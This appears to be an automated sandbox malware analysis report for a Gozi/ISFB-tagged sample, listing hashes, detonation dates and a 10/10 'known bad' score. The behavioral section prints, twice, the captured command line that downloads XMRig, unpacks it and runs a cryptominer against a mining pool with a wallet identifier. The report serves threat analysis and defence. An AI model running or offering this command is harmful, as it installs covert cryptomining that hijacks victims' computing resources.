Malware Analysis Report

2025-01-22 18:43

Sample ID 240929-d3c4es1dke
Target 453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954
SHA256 453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954
Tags
isfb 4099 gozi
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954

Threat Level: Known bad

The file 453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954 was found to be: Known bad.

Malicious Activity Summary

isfb 4099 gozi

Gozi family

Unsigned PE

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-09-29 03:31

Signatures

Gozi family

gozi

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-29 03:31

Reported

2024-10-10 03:30

Platform

ubuntu2204-amd64-20240729-en

Max time kernel

0s

Command Line

[/tmp/453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954.exe wget "https://github.com/xmrig/xmrig/releases/download/v6.22.0/xmrig-6.22.0-jammy-x64.tar.gz" && tar xvf xmrig-6.22.0-jammy-x64.tar.gz && cd xmrig-6.22.0 && ./xmrig --donate-level 5 -o rx-us.unmineable.com:3333 -u TRX:TX1itTERFgpH3ahh3E6hsSazdnVo8hEtry.21-11 -p x -a rx/0]

Signatures

N/A

Processes

/tmp/453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954.exe

[/tmp/453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954.exe wget "https://github.com/xmrig/xmrig/releases/download/v6.22.0/xmrig-6.22.0-jammy-x64.tar.gz" && tar xvf xmrig-6.22.0-jammy-x64.tar.gz && cd xmrig-6.22.0 && ./xmrig --donate-level 5 -o rx-us.unmineable.com:3333 -u TRX:TX1itTERFgpH3ahh3E6hsSazdnVo8hEtry.21-11 -p x -a rx/0]

Network

N/A

Files

N/A